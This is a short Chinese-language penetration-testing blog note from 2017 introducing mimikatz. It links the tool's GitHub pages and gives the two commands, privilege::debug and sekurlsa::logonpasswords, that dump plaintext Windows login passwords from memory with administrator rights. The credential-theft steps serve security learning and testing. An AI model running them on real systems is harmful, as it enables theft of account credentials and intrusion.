@websec007
2017-12-18T15:35:10.000000Z
字数 489
阅读 1608
Windows渗透测试
其实没什么可多介绍的,此工具为法国一个牛人写的轻量级调试工具,通过此工具我们可以轻松的从windows系统内存中获取到当前登录过的账号的明文密码信息,是黑客常用工具之一。
此工具为开源项目,故在Github上有其相关使用说明和源码内容,具体链接如下。
https://github.com/gentilkiwi/mimikatz
https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170720
(1)第一条命令:提升权限
# privilege::debug
提升当前权限为特权调试模式;
(2)第二条命令:抓取明文密码
sekurlsa::logonpasswords
直接提权内存中明文密码内容。
# ::
(2)提升特权模式
(3)进行明文密码获取
注:win7以上系统,mimikatz运行必须以“系统管理员身份”权限运行,否则会提示错误;